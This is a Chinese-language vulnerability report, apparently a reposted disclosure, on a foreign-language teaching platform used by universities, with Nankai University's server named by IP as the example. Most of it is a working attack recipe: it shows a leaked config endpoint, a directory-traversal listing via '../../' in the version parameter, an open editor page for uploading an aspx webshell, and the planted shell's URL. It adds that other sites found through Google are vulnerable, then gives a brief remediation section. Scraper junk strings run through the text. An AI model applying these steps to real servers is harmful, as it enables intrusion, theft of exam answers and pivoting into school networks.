新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
' O7 H. M0 G. e
详细说明：

! F7 U6 J7 }. k7 S- B5 X以南开大学的为例:
% H; g9 ^: z! v3 D) r  lhttp://222.30.60.3/NPELS
( j/ c0 r$ D4 P* |2 Z! r; jNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
1 W  Y9 j1 S1 r  L/ A2 }5 P<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
7 z  w6 @, r6 U- S; }$ {6 o4 o& P0 R</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
. r! M  R! w; a# v8 Z3 ?4 P  T直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
  d6 x" [. i+ a2 n5 xhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
9 m( @0 b* m9 Z1 j' p7 p. x5 {, }http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
2 ]4 g' v$ {  n, r' R* }http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
; g* M8 E; X* u$ V3 h) N* R上传后继续列目录找到木马地址直接访问即可

OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
3 C  b( f3 `6 D' {* }
1 ~5 M" m; \; G$ [7 K列目录：
0 n' q% `' @2 n! B$ ?. hhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
" o$ o% r9 D3 Y5 M  e7 L( P0 z2 s0 G文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
, q0 P5 O. U( j7 I/ c9 t0 Z9 w9 M7 T
上传木马：
& X" A, [* v; D$ }! ehttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
/ g/ x" y' U' D/ R7 V2 p
- K9 }* p" K8 b& G修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
- t% @8 O6 B5 H- R1 l! n并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
" V5 T$ s" p7 X2 S3 Y" V8 S